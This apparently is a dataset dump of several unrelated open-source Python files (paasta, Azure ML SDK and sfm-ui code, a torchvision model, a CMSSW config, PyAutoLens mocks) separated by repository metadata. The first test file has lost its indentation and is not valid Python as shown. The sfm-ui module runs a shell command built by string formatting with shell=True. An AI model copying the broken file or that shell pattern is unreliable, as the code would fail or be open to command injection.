py
|
test_resources.py
|
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import asynctest
import mock
from pyramid import testing
from paasta_tools.api.views.resources import parse_filters
from paasta_tools.api.views.resources import resources_utilization
from paasta_tools.metrics import metastatus_lib
def test_parse_filters_empty():
filters = None
parsed = parse_filters(filters)
assert parsed == {}
def test_parse_filters_good():
filters = ["foo:bar,baz", "qux:zol"]
parsed = parse_filters(filters)
assert "foo" in parsed.keys()
assert "qux" in parsed.keys()
assert "bar" in parsed["foo"]
assert "baz" in parsed["foo"]
assert "zol" in parsed["qux"]
@mock.patch(
"paasta_tools.api.views.resources.metastatus_lib.get_resource_utilization_by_grouping",
autospec=True,
)
@mock.patch("paasta_tools.api.views.resources.get_mesos_master", autospec=True)
def test_resources_utilization_nothing_special(
mock_get_mesos_master, mock_get_resource_utilization_by_grouping
):
request = testing.DummyRequest()
request.swagger_data = {"groupings": None, "filter": None}
mock_mesos_state = mock.Mock()
mock_master = mock.Mock(
state=asynctest.CoroutineMock(return_value=mock_mesos_state)
)
mock_get_mesos_master.return_value = mock_master
mock_get_resource_utilization_by_grouping.return_value = {
frozenset([("superregion", "unknown")]): {
"total": metastatus_lib.ResourceInfo(cpus=10.0, mem=512.0, disk=100.0),
"free": metastatus_lib.ResourceInfo(cpus=8.0, mem=312.0, disk=20.0),
}
}
resp = resources_utilization(request)
body = json.loads(resp.body.decode("utf-8"))
assert resp.status_int == 200
assert len(body) == 1
assert set(body[0].keys()) == {"disk", "mem", "groupings", "cpus", "gpus"}
mock_mesos_state = {
"slaves": [
{
"id": "foo1",
"resources": {"disk": 100, "cpus": 10, "mem": 50},
"attributes": {"pool": "default", "region": "top"},
"reserved_resources": {},
},
{
"id": "bar1",
"resources": {"disk": 100, "cpus": 10, "mem": 50},
"attributes": {"pool": "default", "region": "bottom"},
"reserved_resources": {},
},
{
"id": "foo2",
"resources": {"disk": 100, "cpus": 10, "mem": 50},
"attributes": {"pool": "other", "region": "top"},
"reserved_resources": {},
},
{
"id": "bar2",
"resources": {"disk": 100, "cpus": 10, "mem": 50},
"attributes": {"pool": "other", "region": "bottom"},
"reserved_resources": {},
},
{
"id": "foo3",
"resources": {"disk": 100, "cpus": 10, "mem": 50},
"attributes": {"pool": "other", "region": "top"},
"reserved_resources": {},
},
{
"id": "bar2",
"resources": {"disk": 100, "cpus": 10, "mem": 50},
"attributes": {"pool": "other", "region": "bottom"},
"reserved_resources": {},
},
],
"frameworks": [
{
"tasks": [
{
"state": "TASK_RUNNING",
"resources": {"cpus": 1, "mem": 10, "disk": 10},
"slave_id": "foo1",
},
{
"state": "TASK_RUNNING",
"resources": {"cpus": 1, "mem": 10, "disk": 10},
"slave_id": "bar1",
},
]
}
],
}
@mock.patch("paasta_tools.api.views.resources.get_mesos_master", autospec=True)
def test_resources_utilization_with_grouping(mock_get_mesos_master):
request = testing.DummyRequest()
request.swagger_data = {"groupings": ["region", "pool"], "filter": None}
mock_master = mock.Mock(
state=asynctest.CoroutineMock(
func=asynctest.CoroutineMock(), # https://github.com/notion/a_sync/pull/40
return_value=mock_mesos_state,
)
)
mock_get_mesos_master.return_value = mock_master
resp = resources_utilization(request)
body = json.loads(resp.body.decode("utf-8"))
assert resp.status_int == 200
# 4 groupings, 2x2 attrs for 5 slaves
assert len(body) == 4
@mock.patch("paasta_tools.api.views.resources.get_mesos_master", autospec=True)
def test_resources_utilization_with_filter(mock_get_mesos_master):
request = testing.DummyRequest()
request.swagger_data = {
"groupings": ["region", "pool"],
"filter": ["region:top", "pool:default,other"],
}
mock_master = mock.Mock(
state=asynctest.CoroutineMock(
func=asynctest.CoroutineMock(), # https://github.com/notion/a_sync/pull/40
return_value=mock_mesos_state,
)
)
mock_get_mesos_master.return_value = mock_master
resp = resources_utilization(request)
body = json.loads(resp.body.decode("utf-8"))
assert resp.status_int == 200
assert len(body) == 2
request.swagger_data = {
"groupings": ["region", "pool"],
"filter": ["region:non-exist", "pool:default,other"],
}
resp = resources_utilization(request)
body = json.loads(resp.body.decode("utf-8"))
assert resp.status_int == 200
assert len(body) == 0
|
ce1793f99f17588e74d5c4742edd1f05a639fb61
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/ml/azure-ai-ml/tests/internal_utils/unittests/test_cloud_environments.py
|
91975a6d6e156a4478e26037341b213fdeabc9c7
|
[
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-python-cwi",
"LGPL-2.1-or-later",
"PSF-2.0",
"LGPL-2.0-or-later",
"GPL-3.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"Python-2.0",
"MPL-2.0",
"LicenseRef-scancode-other-copyleft",
"HPND",
"ODbL-1.0",
"GPL-3.0-only",
"ZPL-2.1",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012
| 2023-09-06T01:08:06
| 2023-09-06T01:08:06
| 4,127,088
| 4,046
| 2,755
|
MIT
| 2023-09-14T21:48:49
| 2012-04-24T16:46:12
|
Python
|
UTF-8
|
Python
| false
| false
| 6,985
|
py
|
test_cloud_environments.py
|
import os
import mock
import pytest
from mock import MagicMock, patch
from azure.ai.ml._azure_environments import (
AzureEnvironments,
EndpointURLS,
_get_azure_portal_id_from_metadata,
_get_base_url_from_metadata,
_get_cloud_details,
_get_cloud_information_from_metadata,
_get_default_cloud_name,
_get_registry_discovery_endpoint_from_metadata,
_get_storage_endpoint_from_metadata,
_set_cloud,
)
from azure.ai.ml.constants._common import ArmConstants, AZUREML_CLOUD_ENV_NAME
from azure.mgmt.core import ARMPipelineClient
def mocked_send_request_get(*args, **kwargs):
class MockResponse:
def __init__(self):
self.status_code = 201
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
return
def json(self):
return [
{
"name": "TEST_ENV",
"portal": "testportal.azure.com",
"resourceManager": "testresourcemanager.azure.com",
"authentication": {"loginEndpoint": "testdirectoryendpoint.azure.com"},
"suffixes": {"storage": "teststorageendpoint"},
},
{
"name": "TEST_ENV2",
"portal": "testportal.azure.windows.net",
"resourceManager": "testresourcemanager.azure.com",
"authentication": {"loginEndpoint": "testdirectoryendpoint.azure.com"},
"suffixes": {"storage": "teststorageendpoint"},
},
{"name": "MISCONFIGURED"},
]
return MockResponse()
@pytest.mark.unittest
@pytest.mark.core_sdk_test
class TestCloudEnvironments:
@mock.patch.dict(os.environ, {AZUREML_CLOUD_ENV_NAME: AzureEnvironments.ENV_DEFAULT}, clear=True)
def test_set_valid_cloud_details_china(self):
cloud_environment = AzureEnvironments.ENV_CHINA
_set_cloud(cloud_environment)
cloud_details = _get_cloud_information_from_metadata(cloud_environment)
assert cloud_details.get("cloud") == cloud_environment
assert "default" in str(cloud_details.get("credential_scopes"))
assert "https://management.chinacloudapi.cn" in str(cloud_details.get("credential_scopes"))
def test_set_valid_cloud_details_us_gov(self):
cloud_environment = AzureEnvironments.ENV_US_GOVERNMENT
_set_cloud(cloud_environment)
cloud_details = _get_cloud_information_from_metadata(cloud_environment)
assert cloud_details.get("cloud") == cloud_environment
assert "default" in str(cloud_details.get("credential_scopes"))
assert "https://management.usgovcloudapi.net" in str(cloud_details.get("credential_scopes"))
@mock.patch.dict(os.environ, {AZUREML_CLOUD_ENV_NAME: AzureEnvironments.ENV_DEFAULT}, clear=True)
def test_get_base_url_from_default_environment(self):
cloud_environment = None
_set_cloud(cloud_environment)
base_url = _get_base_url_from_metadata(cloud_environment)
assert "https://management.azure.com" in base_url
def test_get_base_url_from_us_gov(self):
cloud_environment = AzureEnvironments.ENV_US_GOVERNMENT
_set_cloud(cloud_environment)
base_url = _get_base_url_from_metadata(cloud_environment)
assert "https://management.usgovcloudapi.net" in base_url
def test_get_azure_portal_id_from_us_gov(self):
cloud_environment = AzureEnvironments.ENV_US_GOVERNMENT
_set_cloud(cloud_environment)
base_url = _get_azure_portal_id_from_metadata(cloud_environment)
assert "https://portal.azure.us" in base_url
def test_get_storage_endpoint_from_us_gov(self):
cloud_environment = AzureEnvironments.ENV_US_GOVERNMENT
_set_cloud(cloud_environment)
base_url = _get_storage_endpoint_from_metadata(cloud_environment)
assert "core.usgovcloudapi.net" in base_url
def test_set_invalid_cloud(self):
with pytest.raises(Exception) as e:
_set_cloud("yadadada")
assert "Unknown cloud environment supplied" in str(e)
def test_get_default_cloud(self):
with mock.patch("os.environ", {AZUREML_CLOUD_ENV_NAME: "yadadada"}):
cloud_name = _get_default_cloud_name()
assert cloud_name == "yadadada"
def test_get_registry_endpoint_from_public(self):
cloud_environment = AzureEnvironments.ENV_DEFAULT
_set_cloud(cloud_environment)
base_url = _get_registry_discovery_endpoint_from_metadata(cloud_environment)
assert "https://eastus.api.azureml.ms/" in base_url
def test_get_registry_endpoint_from_china(self):
cloud_environment = AzureEnvironments.ENV_CHINA
_set_cloud(cloud_environment)
base_url = _get_registry_discovery_endpoint_from_metadata(cloud_environment)
assert "https://chinaeast2.api.ml.azure.cn/" in base_url
def test_get_registry_endpoint_from_us_gov(self):
cloud_environment = AzureEnvironments.ENV_US_GOVERNMENT
_set_cloud(cloud_environment)
base_url = _get_registry_discovery_endpoint_from_metadata(cloud_environment)
assert "https://usgovarizona.api.ml.azure.us/" in base_url
@mock.patch.dict(os.environ, {}, clear=True)
@mock.patch("azure.mgmt.core.ARMPipelineClient.send_request", side_effect=mocked_send_request_get)
def test_get_cloud_from_arm(self, mock_arm_pipeline_client_send_request):
_set_cloud("TEST_ENV")
cloud_details = _get_cloud_information_from_metadata("TEST_ENV")
assert cloud_details.get("cloud") == "TEST_ENV"
@mock.patch.dict(os.environ, {}, clear=True)
@mock.patch("azure.mgmt.core.ARMPipelineClient.send_request", side_effect=mocked_send_request_get)
def test_all_endpointurls_used(self, mock_get):
cloud_details = _get_cloud_details("TEST_ENV")
endpoint_urls = [a for a in dir(EndpointURLS) if not a.startswith("__")]
for url in endpoint_urls:
try:
cloud_details[EndpointURLS.__dict__[url]]
except:
assert False, "Url not found: {}".format(EndpointURLS.__dict__[url])
assert True
@mock.patch.dict(os.environ, {}, clear=True)
@mock.patch("azure.mgmt.core.ARMPipelineClient.send_request", side_effect=mocked_send_request_get)
def test_metadata_registry_endpoint(self, mock_get):
cloud_details = _get_cloud_details("TEST_ENV2")
assert (
cloud_details.get(EndpointURLS.REGISTRY_DISCOVERY_ENDPOINT)
== "https://test_env2west.api.azureml.windows.net/"
)
@mock.patch.dict(os.environ, {}, clear=True)
@mock.patch("azure.mgmt.core.ARMPipelineClient.send_request", side_effect=mocked_send_request_get)
def test_arm_misconfigured(self, mock_get):
with pytest.raises(Exception) as e_info:
_set_cloud("MISCONFIGURED")
|
d53c1cbf069de48ef2f1831088c2d6720d43b3f9
|
3328540b01c313d58d98ef12ebb4a3c1f82f4bf3
|
/sfm/ui/notifications.py
|
89b966cc27d868bb766bb829af6c3d2b7f338b9f
|
[
"MIT"
] |
permissive
|
gwu-libraries/sfm-ui
|
0f342cc8555813223c048bb26beaeee123a8a319
|
d38886fb7e534973ea979caad2ab31b3904d651b
|
refs/heads/master
| 2023-08-21T16:34:31.967005
| 2023-08-10T20:51:56
| 2023-08-10T20:51:56
| 39,789,776
| 144
| 32
|
MIT
| 2023-07-05T23:25:54
| 2015-07-27T18:03:43
|
Python
|
UTF-8
|
Python
| false
| false
| 16,697
|
py
|
notifications.py
|
import logging
from datetime import date, datetime, timedelta, time
from collections import OrderedDict
from smtplib import SMTPException
from subprocess import check_output, CalledProcessError
import pytz
from itertools import chain
from django.template.loader import get_template
from django.core.mail import EmailMultiAlternatives
from django.db.models import Sum, Q
from django.conf import settings
from django.urls import reverse
from .models import User, CollectionSet, Collection, HarvestStat, Harvest
from .sched import next_run_time
from .utils import get_admin_email_addresses, get_site_url
from . import monitoring
log = logging.getLogger(__name__)
class MonitorSpace(object):
def __init__(self, volume_dir, threshold):
"""
        A class for monitoring the free space of a given directory.
        :param volume_dir: the mounted volume directory, used as the id of this record.
:param threshold: the free space threshold.
:return:
"""
# deal with the empty string
if not volume_dir:
volume_dir = 'None'
if not threshold:
threshold = '10GB'
self.space_msg_cache = {'volume_id': volume_dir, 'threshold': threshold, 'bar_color': 'progress-bar-success'}
def analysis_space(self):
"""
        Parse total and free space from the output of 'df -h -BM' for this volume.
"""
total_free_space = total_space = 0
res = self.run_check_cmd()
split_lines = res.split('\n')
for line in split_lines:
line_units = list(filter(None, line.split(' ')))
            # sfm-data and sfm-processing are mounted at sfm-data,
            # so we only need to count sfm-data
if line_units:
# The following uncommented code will not work anymore, '/sfm-data' was removed and replaced by '/sfm-db-data', '/sfm-mq-data' etc
# get rid of the unit at the space,12M
# eg:['/dev/sda1', '208074M', '47203M', '150279M', '24%', '/sfm-data']
total_free_space = int(line_units[3][:-1])
total_space = int(line_units[1][:-1])
self.space_msg_cache['total_space'] = self._size_readable_fmt(total_space)
self.space_msg_cache['total_free_space'] = self._size_readable_fmt(total_free_space)
self.space_msg_cache['percentage'] = 0 if not total_space else int(
float(total_space - total_free_space) / float(total_space) * 100)
# update bar color with percentage
self.space_msg_cache['bar_color'] = self._get_bar_color(self.space_msg_cache['percentage'])
return total_free_space
def get_space_info(self):
"""
get the space info and check whether to send email
"""
self.space_msg_cache['send_email'] = False
# get the free space info
total_free_space = self.analysis_space()
        # if no space info is available, return the cached message as-is
if self.space_msg_cache['total_space'] == '0.0MB':
return self.space_msg_cache
# deal with the configuration
suffix = self.space_msg_cache['threshold'][-2:]
if suffix not in {'MB', 'GB', 'TB'}:
log.error("Free Space threshold %s, configure suffix error.",
self.space_msg_cache['threshold'])
return self.space_msg_cache
# get rid of the unit and deal with GB/TB, compare with MB
space_threshold = int(self.space_msg_cache['threshold'][:-2])
if suffix == 'GB':
space_threshold *= 1024
        elif suffix == 'TB':
            space_threshold *= 1048576  # 1024 * 1024 MB per TB
log.debug("total space %s, space threshold %s,", self.space_msg_cache['total_free_space'],
self.space_msg_cache['threshold'])
if total_free_space < space_threshold:
self.space_msg_cache['send_email'] = True
return self.space_msg_cache
def run_check_cmd(self):
cmd = "df -h -BM {volume_id} | grep -w {volume_id}".format(volume_id=self.space_msg_cache['volume_id'])
res = ''
try:
res = check_output(cmd, shell=True)
log.debug("Running %s completed.", cmd)
except CalledProcessError as e:
log.error("%s returned %s: %s", cmd, e.returncode, e.output)
return res.decode('utf-8')
@staticmethod
def _size_readable_fmt(num, suffix='B'):
for unit in ['M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Y', suffix)
@staticmethod
def _get_bar_color(percentage):
if 70 <= percentage <= 80:
return 'bg-warning'
elif percentage > 80:
return 'bg-danger'
return 'bg-success'
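# --- Hedged usage sketch (illustrative only; not part of the original module) ---
# Why: MonitorSpace above wraps a `df -h -BM` call; this shows how a single volume
# could be checked against a threshold. Assumptions (not from the source): the
# directory path is hypothetical and `df` is available on the host.
#
# monitor = MonitorSpace('/sfm-db-data', '10GB')
# info = monitor.get_space_info()
# if info['send_email']:
#     print("Low free space on %s: %s free of %s" % (
#         info['volume_id'], info['total_free_space'], info['total_space']))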
def get_free_space():
"""
an interface to get the space info
:return: a space data list
"""
data_list = []
# get data directories info (sfm-db-data, sfm-mq-data, sfm-export-data, sfm-containers-data and sfm-collection-set-data)
data_db_monitor = MonitorSpace(settings.SFM_DB_DATA_DIR, settings.DATA_THRESHOLD_DB)
data_mq_monitor = MonitorSpace(settings.SFM_MQ_DATA_DIR, settings.DATA_THRESHOLD_MQ)
data_export_monitor = MonitorSpace(settings.SFM_EXPORT_DATA_DIR, settings.DATA_THRESHOLD_EXPORT)
data_containers_monitor = MonitorSpace(settings.SFM_CONTAINERS_DATA_DIR, settings.DATA_THRESHOLD_CONTAINERS)
data_collection_set_monitor = MonitorSpace(settings.SFM_COLLECTION_SET_DATA_DIR, settings.DATA_THRESHOLD_COLLECTION_SET)
data_list.append(data_db_monitor.get_space_info())
data_list.append(data_mq_monitor.get_space_info())
data_list.append(data_export_monitor.get_space_info())
data_list.append(data_containers_monitor.get_space_info())
data_list.append(data_collection_set_monitor.get_space_info())
if is_shared():
data_shared_monitor = MonitorSpace(settings.SFM_SHARED_DIR, settings.DATA_THRESHOLD_SHARED)
data_list.append(data_shared_monitor.get_space_info())
# get sfm-processing info
processing_monitor = MonitorSpace(settings.SFM_PROCESSING_DIR, settings.PROCESSING_THRESHOLD)
data_list.append(processing_monitor.get_space_info())
return data_list
def send_free_space_emails():
log.info("Sending free space emails")
msg_cache = {
# get the space mem
'space_data': get_free_space()
}
if _should_send_space_email(msg_cache):
email_addresses = get_admin_email_addresses()
for email_address in email_addresses:
msg = _create_space_email(email_address, msg_cache)
try:
log.debug("Sending email to %s: %s", msg.to, msg.subject)
msg.send()
except SMTPException as ex:
log.error("Error sending email: %s", ex)
except IOError as ex:
log.error("Error sending email: %s", ex)
def _should_send_space_email(msg_cache):
    # return True if any volume needs an email sent
return any(msg['send_email'] for msg in msg_cache['space_data'])
def _create_space_email(email_address, msg_cache):
text_template = get_template('email/free_space_email.txt')
html_template = get_template('email/free_space_email.html')
msg_cache["url"] = _create_url(reverse('home'))
d = msg_cache
msg = EmailMultiAlternatives("[WARNING] Low free space on SFM server",
text_template.render(d), settings.EMAIL_FROM, [email_address])
msg.attach_alternative(html_template.render(d), "text/html")
return msg
def get_queue_data():
queue_threshold_map = settings.QUEUE_LENGTH_THRESHOLD
queue_threshold_other = settings.QUEUE_LENGTH_THRESHOLD_OTHER
return get_warn_queue(queue_threshold_map, queue_threshold_other)
def get_warn_queue(q_th_map, q_th_other):
hqs, eqs, uqs = monitoring.monitor_queues()
# filter any msg count larger than the threshold
return list(filter(lambda x: x[1] >= int(q_th_map[x[0]] if x[0] in q_th_map else q_th_other),
chain(hqs.items(), eqs.items(), uqs.items())))
def send_queue_warn_emails():
log.info("Sending queue length warning emails")
# get queue data and determine whether to send email
msg_cache = {
'queue_data': get_queue_data()
}
if len(msg_cache['queue_data']):
email_addresses = get_admin_email_addresses()
for email_address in email_addresses:
msg = _create_queue_warn_email(email_address, msg_cache)
try:
log.debug("Sending email to %s: %s", msg.to, msg.subject)
msg.send()
except SMTPException as ex:
log.error("Error sending email: %s", ex)
except IOError as ex:
log.error("Error sending email: %s", ex)
def _create_queue_warn_email(email_address, msg_cache):
text_template = get_template('email/queue_length_email.txt')
html_template = get_template('email/queue_length_email.html')
msg_cache["url"] = _create_url(reverse('home'))
msg_cache["monitor_url"] = _create_url(reverse('monitor'))
d = msg_cache
msg = EmailMultiAlternatives("[WARNING] Long message queue on SFM server",
text_template.render(d), settings.EMAIL_FROM, [email_address])
msg.attach_alternative(html_template.render(d), "text/html")
return msg
def send_user_harvest_emails(users=None):
log.info("Sending user harvest emails")
collection_set_cache = {}
if users is None:
users = User.objects.all()
for user in users:
if _should_send_email(user):
msg = _create_email(user, collection_set_cache)
try:
log.debug("Sending email to %s: %s", msg.to, msg.subject)
msg.send()
except SMTPException as ex:
log.error("Error sending email: %s", ex)
except IOError as ex:
log.error("Error sending email: %s", ex)
else:
log.debug("Not sending email to %s", user.username)
def _should_send_email(user, today=None):
if today is None:
today = date.today()
send_email = False
has_active_collections = Collection.objects.filter(collection_set__group__in=user.groups.all(),
is_on=True).exists()
if user.email and has_active_collections:
if user.email_frequency == User.DAILY:
send_email = True
elif user.email_frequency == User.MONTHLY and today.day == 1:
send_email = True
elif user.email_frequency == User.WEEKLY and today.weekday() == 6:
send_email = True
return send_email
def _create_email(user, collection_set_cache):
text_template = get_template('email/user_harvest_email.txt')
html_template = get_template('email/user_harvest_email.html')
d = _create_context(user, collection_set_cache)
msg = EmailMultiAlternatives("Update on your Social Feed Manager harvests", text_template.render(d),
settings.EMAIL_FROM, [user.email])
msg.attach_alternative(html_template.render(d), "text/html")
return msg
def _create_context(user, collection_set_cache):
# Start and end are datetimes. The range is inclusive.
today = datetime.utcnow().date()
# Yesterday
yesterday = today + timedelta(days=-1)
yesterday_start = datetime.combine(yesterday,
time(time.min.hour, time.min.minute, time.min.second, tzinfo=pytz.utc))
yesterday_end = datetime.combine(yesterday, time(time.max.hour, time.max.minute, time.max.second, tzinfo=pytz.utc))
# Previous day
prev_day_start = yesterday_start + timedelta(days=-1)
prev_day_end = yesterday_end + timedelta(days=-1)
last_7_start = yesterday_start + timedelta(days=-6)
last_7_end = yesterday_end
prev_7_start = last_7_start + timedelta(days=-7)
prev_7_end = yesterday_end + timedelta(days=-7)
last_30_start = yesterday_start + timedelta(days=-29)
last_30_end = yesterday_end
prev_30_start = last_30_start + timedelta(days=-30)
prev_30_end = last_30_end + timedelta(days=-30)
time_ranges = (
('yesterday', yesterday_start, yesterday_end),
('prev_day', prev_day_start, prev_day_end),
('last_7', last_7_start, last_7_end),
('prev_7', prev_7_start, prev_7_end),
('last_30', last_30_start, last_30_end),
('prev_30', prev_30_start, prev_30_end)
)
c = {
"url": _create_url(reverse('home'))
}
# Ordered list of collection sets
collection_sets = OrderedDict()
for collection_set in CollectionSet.objects.filter(group__in=user.groups.all()).filter(
collections__is_active=True).order_by('name'):
# Using a cache to avoid regenerating the data repeatedly.
if collection_set in collection_set_cache:
collections = collection_set_cache[collection_set]
else:
collections = OrderedDict()
for collection in Collection.objects.filter(collection_set=collection_set).filter(is_active=True).order_by(
'name'):
collection_info = {
"url": _create_url(reverse('collection_detail', args=(collection.id,)))
}
if collection.is_on:
collection_info['next_run_time'] = next_run_time(collection.id)
stats = {}
for name, range_start, range_end in time_ranges:
_add_stats(stats, name, collection, range_start, range_end)
for name, range_start, range_end in time_ranges:
_update_stats_for_na(stats, name, collection, range_start, range_end)
collection_info['stats'] = stats
collections[collection] = collection_info
collection_set_cache[collection_set] = collections
collection_sets[collection_set] = {
"collections": collections,
"url": _create_url(reverse('collection_set_detail', args=(collection_set.id,)))
}
c['collection_sets'] = collection_sets
return c
def _add_stats(stats, name, collection, range_start, range_end):
result_set = HarvestStat.objects.filter(harvest__collection=collection,
harvest_date__gte=range_start.date(),
harvest_date__lte=range_end.date()).values(
'item').annotate(count=Sum('count'))
for result in result_set:
item = result['item']
if item not in stats:
stats[item] = {
'yesterday': 0,
'prev_day': 0,
'last_7': 0,
'prev_7': 0,
'last_30': 0,
'prev_30': 0
}
stats[item][name] = result['count']
def _update_stats_for_na(stats, name, collection, range_start, range_end):
for item, item_stats in stats.items():
if item != "web resource" and item_stats[name] == 0 and not _was_harvest_in_range(range_start, range_end,
collection):
item_stats[name] = "N/A"
def _was_harvest_in_range(range_start, range_end, collection):
# Harvests that have start and end (i.e., completed)
if Harvest.objects.filter(Q(collection=collection)
& Q(date_started__isnull=False)
& Q(date_ended__isnull=False)
& (Q(date_started__range=(range_start, range_end))
| Q(date_ended__range=(range_start, range_end))
| (Q(date_started__lt=range_start) & Q(date_ended__gt=range_end)))
& ~Q(harvest_type='web')).exists():
return True
# Harvests that are still running
# Using status=RUNNING to try to filter out some
if Harvest.objects.filter(Q(collection=collection)
& Q(status=Harvest.RUNNING)
& Q(date_started__isnull=False)
& Q(date_ended__isnull=True)
& Q(date_started__range=(range_start, range_end))
& ~Q(harvest_type='web')).exists():
return True
return False
def _create_url(path):
return get_site_url() + path
def is_shared():
if settings.SFM_SHARED_DIR and settings.DATA_THRESHOLD_SHARED:
return True
return False
|
04eee69145dab2ff280280cf4d1bd29b06eacffd
|
38bed8ec0229b2d42ebdb33e09930ba8ee6ba5b7
|
/references/similarity/model.py
|
f235ae11116591f6564d3ea6f41dfe58921fede3
|
[
"BSD-3-Clause",
"CC-BY-NC-4.0"
] |
permissive
|
pytorch/vision
|
10443ac1eddf7a32ecb288fe8f58e28cab2a60a1
|
1f94320d8db8d102214a7dc02c22fa65ee9ac58a
|
refs/heads/main
| 2023-09-06T03:48:02.303020
| 2023-09-04T18:25:36
| 2023-09-04T18:25:36
| 73,328,905
| 15,620
| 8,564
|
BSD-3-Clause
| 2023-09-14T17:52:49
| 2016-11-09T23:11:43
|
Python
|
UTF-8
|
Python
| false
| false
| 395
|
py
|
model.py
|
import torch.nn as nn
import torchvision.models as models
class EmbeddingNet(nn.Module):
def __init__(self, backbone=None):
super().__init__()
if backbone is None:
backbone = models.resnet50(num_classes=128)
self.backbone = backbone
def forward(self, x):
x = self.backbone(x)
x = nn.functional.normalize(x, dim=1)
return x
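# --- Hedged usage sketch (illustrative only; not part of the original file) ---
# Why: a quick smoke test of EmbeddingNet showing the L2-normalized 128-d output.
# Assumptions (not from the source): input images of size 224x224, batch of 2.
#
# import torch
# net = EmbeddingNet()
# with torch.no_grad():
#     emb = net(torch.randn(2, 3, 224, 224))
# print(emb.shape)        # torch.Size([2, 128])
# print(emb.norm(dim=1))  # each row has (approximately) unit L2 norm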
|
bb942c3604ce44000125f611d964dfd2e3f5ae90
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/Validation/HGCalValidation/test/python/standalone_fromRECO.py
|
92d46ceb9ae92393af702e5584d28ca18a3d35f4
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 2,295
|
py
|
standalone_fromRECO.py
|
import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Phase2C17I13M9_cff import Phase2C17I13M9
process = cms.Process('HGCAL',Phase2C17I13M9)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('Configuration.Geometry.GeometryExtended2026D88Reco_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('file:step3.root'),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
SkipEvent = cms.untracked.vstring('ProductNotFound')
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('step3 nevts:10'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
process.DQMoutput = cms.OutputModule("DQMRootOutputModule",
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('DQMIO'),
filterName = cms.untracked.string('')
),
fileName = cms.untracked.string('file:step3_inDQM.root'),
outputCommands = process.DQMEventContent.outputCommands,
splitLevel = cms.untracked.int32(0)
)
# Additional output definition
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:phase2_realistic_T21', '')
process.load("Validation.HGCalValidation.hgcalHitValidation_cfi")
process.load("Validation.HGCalValidation.hgcalHitCalibration_cfi")
process.load("Validation.HGCalValidation.caloparticlevalidation_cfi")
process.dqmoffline_step = cms.EndPath(process.hgcalHitValidation+process.hgcalHitCalibration+process.caloparticlevalidation)
process.DQMoutput_step = cms.EndPath(process.DQMoutput)
# Schedule definition
process.schedule = cms.Schedule(process.dqmoffline_step,process.DQMoutput_step)
#Setup FWK for multithreaded
process.options.numberOfThreads=cms.untracked.uint32(6)
process.options.numberOfStreams=cms.untracked.uint32(0)
# customisation of the process.
|
22f1a19edc1ccd05f73c221aa0d4ea0405299062
|
ca7a8f43442e2c6722ebaf03f0abe9a22575a130
|
/autolens/lens/mock/mock_tracer.py
|
332b302731059d9054818f42930de9c20e81a543
|
[
"MIT"
] |
permissive
|
Jammy2211/PyAutoLens
|
764f2ccdb76b54eea0b4a8f2a0ae077397fb0315
|
b31b9d7c8a55d7232695761a41383cb1cc30bd76
|
refs/heads/main
| 2023-08-23T10:07:14.015683
| 2023-08-17T15:39:49
| 2023-08-17T15:39:49
| 105,440,853
| 142
| 37
|
MIT
| 2023-09-13T14:08:23
| 2017-10-01T12:33:03
|
Python
|
UTF-8
|
Python
| false
| false
| 1,698
|
py
|
mock_tracer.py
|
class MockTracer:
def __init__(
self, traced_grid_2d_list_from=None, sparse_image_plane_grid_pg_list=None
):
self.sparse_image_plane_grid_pg_list = sparse_image_plane_grid_pg_list
self._traced_grid_2d_list_from = traced_grid_2d_list_from
def traced_grid_2d_list_from(self, grid):
return self._traced_grid_2d_list_from
class MockTracerPoint(MockTracer):
def __init__(
self,
sparse_image_plane_grid_pg_list=None,
traced_grid=None,
attribute=None,
profile=None,
magnification=None,
einstein_radius=None,
einstein_mass=None,
):
super().__init__(
sparse_image_plane_grid_pg_list=sparse_image_plane_grid_pg_list
)
self.positions = traced_grid
self.attribute = attribute
self.profile = profile
self.magnification = magnification
self.einstein_radius = einstein_radius
self.einstein_mass = einstein_mass
@property
def planes(self):
return [0, 1]
def deflections_yx_2d_from(self):
pass
def extract_attribute(self, cls, attr_name):
return [self.attribute]
